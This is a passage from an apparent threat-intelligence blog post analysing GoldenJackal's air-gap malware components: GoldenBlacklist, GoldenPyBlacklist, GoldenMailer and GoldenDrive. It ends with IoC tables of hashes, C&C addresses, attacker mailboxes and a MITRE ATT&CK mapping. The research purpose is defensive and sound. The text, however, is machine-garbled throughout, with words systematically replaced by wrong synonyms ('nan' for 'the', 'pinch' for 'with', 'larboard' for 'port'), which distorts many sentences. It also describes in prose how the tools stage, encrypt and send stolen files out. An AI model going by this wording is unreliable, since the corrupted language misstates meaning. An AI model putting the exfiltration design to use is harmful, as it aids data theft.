The decrypted archive, update46.tar.gz, is extracted successful memory, and only those files that lucifer definite criteria are written to a subdirectory tmp, successful nan directory wherever nan malware is running. Criteria:

• The record does not incorporate immoderate email connected a blocklist of email addresses. This is done to region email messages that travel from senders that usually are not interesting. While we can’t see nan afloat database here, it’s worthy mentioning that galore of nan email addresses are related to newsletters and property releases. It’s important to statement that nan attackers must person been operating for immoderate clip to build a database for illustration this.
• The record contains nan drawstring Content-Type: application. This is to support email messages that person attachments, specified arsenic PDF files, Microsoft Office files, and archives, to sanction a few.

Once nan files are selected, GoldenBlacklist archives nan tmp directory and encrypts it pinch openssl.exe, utilizing nan aforesaid encryption cardinal arsenic nan 1 utilized to decrypt nan first archive. The resulting record is archive.out. All intermediate files and folders are past deleted, arsenic good arsenic openssl.exe, libssl-3-x64.dll, and libcrypto-3-x64.dll, each located successful nan malware’s directory. This indicates that different constituent that we didn’t observe copied those morganatic binaries location successful nan first place.

GoldenPyBlacklist

GoldenPyBlacklist is simply a Python implementation of GoldenBlacklist. It was packaged pinch PyInstaller and nan original sanction of nan book is duplxer_black_list_for_external_use.py. Some differences to nan different constituent are:

• the first archive is written arsenic ress.out,
• the cardinal for decryption is nan same, isolated from for a different first character,
• the decrypted archive is extracted to nan C:\Windows\System32\temp directory for processing,
• one further criterion for record action is added to process only filenames that extremity successful .msg (these are files created pinch Microsoft Outlook),
• files that do not meet nan criteria are deleted,
• the last archive is created pinch nan 7-Zip archiver, and
• the last encrypted record is named ArcSrvcUI.ter.

GoldenMailer

Classified arsenic an exfiltration component, GoldenMailer exfiltrates files by sending emails pinch attachments to attacker-controlled accounts. It was written successful Python and packaged pinch PyInstaller, and nan original sanction of nan book is send_to_hole.py. GoldenMailer connects to legitimate servers – either smtp-mail.outlook.com aliases smtp.office365.com – to nonstop email messages, utilizing SMTP connected larboard 587.

The configuration is publication from a file, C:\ProgramData\Microsoft\Windows\Caches\cversions.ini, successful nan aforesaid directory wherever GoldenMailer is running. The configuration consists of nan pursuing 5 lines:

• email reside to authenticate to nan SMTP server, and to usage arsenic some sender and destination address,
• password to authenticate to nan SMTP server,
• path to directory pinch archives to exfiltrate,
• base filename (e.g., press.pdf) utilized for archives to exfiltrate; these archives usage nan pursuing naming convention: <base_filename>.<three_digit_sequence_number>, and
• number of files to exfiltrate.

We noticed that this configuration record was copied from different PC successful nan section network. Given that nan configuration record indicates really galore archives are disposable to beryllium exfiltrated, we presume that these archives must besides beryllium copied complete nan network, separating nan tasks of collection, distribution, and exfiltration. It is apt that nan configuration record is generated by nan constituent successful complaint of collecting files and creating archives for exfiltration, but we didn’t observe that component.

Figure 10 shows an illustration of an email connection sent by GoldenMailer. The taxable has a typo: it sounds Press realese. The assemblage is very elemental and reads: Daily News astir Israel-Hamas war. These strings are hardcoded successful nan malware’s binary. Only 1 attachment is sent per email; if location are galore archives to exfiltrate, 1 email is sent for each.

Figure 10. Example of an email connection utilized to exfiltrate files

The configuration files that we observed contained nan pursuing email addresses:

• mariaalpane@outlook[.]com
• katemarien087@outlook[.]com
• spanosmitsotakis@outlook[.]com

GoldenDrive

As opposed to GoldenMailer, this constituent exfiltrates files by uploading them to Google Drive. Necessary credentials are recovered successful 2 files, which are hardcoded successful nan malware: credentials.json, which contains fields specified arsenic client_id and client_secret, and token.json, pinch fields specified arsenic access_token and refresh_token. A reference to Google Drive’s API and immoderate codification snippets successful nan Go programming connection tin beryllium recovered here.

Similar to GoldenMailer, this constituent tin upload only 1 record astatine a time. GoldenDrive is executed pinch an statement that provides nan afloat way to nan record to upload.

Conclusion

In this blogpost, we revealed 2 caller toolsets utilized by nan GoldenJackal APT group to target air-gapped systems of governmental organizations, including those successful Europe. Common functionalities see nan usage of USB drives to bargain confidential documents.

Managing to deploy 2 abstracted toolsets for breaching air-gapped networks successful only 5 years shows that GoldenJackal is simply a blase threat character alert of web segmentation utilized by its targets.

A broad database of indicators of discuss (IoCs) tin beryllium recovered successful our GitHub repository.

For immoderate inquiries astir our investigation published connected WeLiveSecurity, please interaction america astatine threatintel@eset.com. 

ESET Research offers backstage APT intelligence reports and information feeds. For immoderate inquiries astir this service, sojourn nan ESET Threat Intelligence page.

IoCs

Files

SHA-1	Filename	Detection	Description
DA9562F5268FA61D19648DFF9C6A57FB8AB7B0D7	winaero.exe	Win32/Agent.AGKQ	GoldenDealer.
5F12FFD272AABC0D5D611D18812A196A6EA2FAA9	1102720677	Python/Agent.ANA  Python/HackTool.Agent.W  Python/Riskware.LdapDump.A  Python/Riskware.Impacket.C	GoldenHowl.
6DE7894F1971FDC1DF8C4E4C2EDCC4F4489353B6	OfficeAutoComplete.exe	WinGo/Agent.AAO	GoldenRobo.
7CB7C3E98CAB2226F48BA956D3BE79C52AB62140	prinntfy.dll	WinGo/DataStealer.A	GoldenUsbCopy.
8F722EB29221C6EAEA9A96971D7FB78DAB2AD923	zUpdater.exe	WinGo/Spy.Agent.AH	GoldenUsbGo.
24FBCEC23E8B4B40FEA188132B0E4A90C65E3FFB	fc.exe	WinGo/DataStealer.C	GoldenAce.
A87CEB21EF88350707F278063D7701BDE0F8B6B7	upgrade	MSIL/Agent.WPJ	JackalWorm – simpler version.
9CBE8F7079DA75D738302D7DB7E97A92C4DE5B71	fp.exe	WinGo/Spy.Agent.CA	GoldenBlacklist.
9083431A738F031AC6E33F0E9133B3080F641D90	fp.exe	Python/TrojanDownloader.Agent.YO	GoldenPyBlacklist.
C830EFD843A233C170285B4844C5960BA8381979	cb.exe	Python/Agent.ALE	GoldenMailer.
F7192914E00DD0CE31DF0911C073F522967C6A97	GoogleUpdate.exe	WinGo/Agent.YH	GoldenDrive.
B2BAA5898505B32DF7FE0A7209FC0A8673726509	fp.exe	Python/Agent.ALF	Python HTTP server.

Network

IP	Domain	Hosting provider	First seen	Details
83.24.9[.]124	N/A	Orange Polska Spolka Akcyjna	2019‑08‑09	Primary C&C server utilized by GoldenJackal successful 2019.
196.29.32[.]210	N/A	UTANDE	2019‑08‑09	Secondary C&C server utilized by GoldenJackal successful 2019.
N/A	assistance[.]uz	N/A	2019‑09‑25	Compromised website utilized to download malware.
N/A	thehistore[.]com	N/A	2019‑09‑25	Compromised website utilized arsenic a C&C server.
N/A	xgraphic[.]ro	N/A	2019‑09‑25	Compromised website utilized arsenic a C&C server.

Email Addresses

• mariaalpane@outlook[.]com
• katemarien087@outlook[.]com
• spanosmitsotakis@outlook[.]com

MITRE ATT&CK techniques

This array was built utilizing version 15 of nan MITRE ATT&CK framework.

Tactic	ID	Name	Description
Resource Development	T1583.003	Acquire Infrastructure: Virtual Private Server	GoldenJackal astir apt acquired a VPS server to usage arsenic a secondary C&C server for nan GoldenDealer malware.
	T1583.004	Acquire Infrastructure: Server	GoldenJackal apt acquired a server to usage arsenic a superior C&C server for nan GoldenDealer malware.
	T1584.006	Compromise Infrastructure: Web Services	GoldenJackal has utilized compromised WordPress sites for C&C infrastructure, utilized by nan JackalControl and JackalSteal malware.
	T1587.001	Develop Capabilities: Malware	GoldenJackal develops its ain civilization malware.
	T1585.003	Establish Accounts: Cloud Accounts	GoldenJackal has utilized Google Drive to shop exfiltrated files and morganatic tools.
	T1588.002	Obtain Capabilities: Tool	GoldenJackal uses morganatic tools, specified arsenic Plink and PsExec, for post-compromise operations.
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	GoldenJackal executed PowerShell scripts to download nan JackalControl malware from a compromised WordPress website.
	T1059.003	Command and Scripting Interpreter: Windows Command Shell	GoldenAce uses cmd.exe to tally a batch book to execute different malicious components.
	T1059.006	Command and Scripting Interpreter: Python	GoldenHowl contains various malicious modules that are Python scripts.
	T1106	Native API	GoldenDealer tin transcript and tally an executable record pinch nan CreateProcessW API.
	T1569.002	System Services: Service Execution	GoldenDealer tin tally arsenic a service.
	T1204.002	User Execution: Malicious File	JackalWorm uses a files icon to entice a imaginable unfortunate to motorboat it.
Persistence	T1543.003	Create aliases Modify System Process: Windows Service	GoldenDealer creates nan work NetDnsActivatorSharing to persist connected a compromised system.
	T1547.001	Boot aliases Logon Autostart Execution: Registry Run Keys / Startup Folder	If GoldenDealer fails to create a work for persistence, an introduction successful a Run registry cardinal is created instead.
	T1053.005	Scheduled Task/Job: Scheduled Task	GoldenHowl creates nan scheduled task Microsoft\Windows\Multimedia\ SystemSoundsService2 for persistence.
Defense Evasion	T1564.001	Hide Artifacts: Hidden Files and Directories	GoldenDealer modifies nan registry truthful that hidden files and directories are not shown successful Windows Explorer. GoldenDealer, GoldenAce, and Jackal worm create hidden folders connected USB drives.
	T1070.004	Indicator Removal: File Deletion	GoldenAce deletes payloads aft they are run. GoldenBlacklist and GoldenPyBlacklist delete intermediate files aft nan last archives are generated.
	T1036.005	Masquerading: Match Legitimate Name aliases Location	GoldenUsbCopy uses a morganatic Firefox directory C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\ to shape files.
	T1036.008	Masquerading: Masquerade File Type	JackalWorm uses a files icon to disguise itself arsenic a non-executable file.
	T1112	Modify Registry	GoldenDealer modifies nan registry truthful that hidden files and directories are not shown successful Windows Explorer.
	T1027.013	Obfuscated Files aliases Information: Encrypted/Encoded File	GoldenJackal uses various encryption algorithms successful its toolset, specified arsenic XOR, Fernet, and AES, to encrypt configuration files and files to beryllium exfiltrated.
Credential Access	T1552.001	Unsecured Credentials: Credentials In Files	GoldenUsbGo looks for files pinch filenames that are usually associated pinch credentials.
	T1552.004	Unsecured Credentials: Private Keys	GoldenUsbGo looks for files that whitethorn incorporate backstage keys, specified arsenic those pinch filenames that incorporate id_rsa.
Discovery	T1087.001	Account Discovery: Local Account	GoldenDealer collects accusation astir each personification accounts connected a compromised system.
	T1083	File and Directory Discovery	GoldenHowl has a module to make a listing of files and directories connected a compromised system. GoldenUsbCopy and GoldenUsbGo make a listing of files and directories connected a USB drive.
	T1046	Network Service Discovery	GoldenHowl tin scan a distant strategy for unfastened ports, and whether nan target is susceptible to EternalBlue malware.
	T1120	Peripheral Device Discovery	GoldenDealer and GoldenUsbCopy show nan insertion of removable drives. GoldenUsbGo and GoldenAce cheque for various thrust letters, to observe attached removable drives.
	T1057	Process Discovery	GoldenDealer obtains accusation astir moving processes connected a compromised system.
	T1018	Remote System Discovery	GoldenHowl tin scan an IP scope to observe different systems.
	T1518	Software Discovery	GoldenDealer obtains accusation astir installed programs connected a compromised system.
	T1082	System Information Discovery	GoldenDealer obtains various accusation astir nan operating strategy and personification accounts connected a compromised system.
	T1016.001	System Network Configuration Discovery: Internet Connection Discovery	GoldenDealer tin find whether a machine is connected to nan internet.
	T1135	Network Share Discovery	GoldenAce checks a database of thrust letters that tin see web shares.
Lateral Movement	T1210	Exploitation of Remote Services	GoldenHowl tin cheque for a Windows SMB distant codification execution vulnerability that tin past beryllium exploited for lateral movement.
	T1091	Replication Through Removable Media	GoldenDealer copies executables to and from USB drives, to target air-gapped systems. GoldenAce propagates malicious executables via removable drives.
Collection	T1560.002	Archive Collected Data: Archive via Library	GoldenRobo and GoldenUsbCopy archive files to beryllium exfiltrated pinch nan ZIP library.
	T1119	Automated Collection	GoldenUsbCopy and GoldenUsbGo automatically shape files for later exfiltration, erstwhile a caller removable thrust is detected.
	T1005	Data from Local System	Most devices successful GoldenJackal’s toolset cod accusation and files from nan section system.
	T1025	Data from Removable Media	GoldenUsbCopy and GoldenUsbGo cod absorbing files from removable media.  GoldenAce tin retrieve staged files from a circumstantial directory connected a removable drive.  GoldenDealer tin retrieve accusation from compromised systems from a circumstantial directory connected a removable drive.
	T1074.001	Data Staged: Local Data Staging	Most devices successful GoldenJackal’s toolset shape files locally for different components to process aliases exfiltrate them.
	T1114.001	Email Collection: Local Email Collection	GoldenBlacklist and GoldenPyBlacklist process email files that were collected by an chartless constituent successful GoldenJackal’s toolset.
Command and Control	T1071.001	Application Layer Protocol: Web Protocols	GoldenDealer and GoldenHowl usage HTTPS for communication.
	T1092	Communication Through Removable Media	GoldenDealer uses removable media to walk executables to air-gapped systems, and accusation from those systems backmost to connected systems.
	T1132.001	Data Encoding: Standard Encoding	Executable files sent from nan C&C server to GoldenDealer are base64 encoded.
	T1572	Protocol Tunneling	GoldenHowl tin guardant messages done an SSH tunnel.
	T1090.001	Proxy: Internal Proxy	GoldenHowl tin enactment arsenic a proxy, forwarding packets.
Exfiltration	T1041	Exfiltration Over C2 Channel	GoldenHowl exfiltrates files via nan aforesaid transmission utilized arsenic its C&C.
	T1052.001	Exfiltration Over Physical Medium: Exfiltration complete USB	GoldenJackal’s toolset provides capabilities to transcript files from air-gapped systems and move them to connected systems via USB drives, for exfiltration.
	T1567.002	Exfiltration Over Web Service: Exfiltration to Cloud Storage	GoldenDrive exfiltrates files to an attacker-controlled Google Drive account.
	T1048.002	Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	GoldenMailer exfiltrates files via SMTP, utilizing STARTTLS connected larboard 587.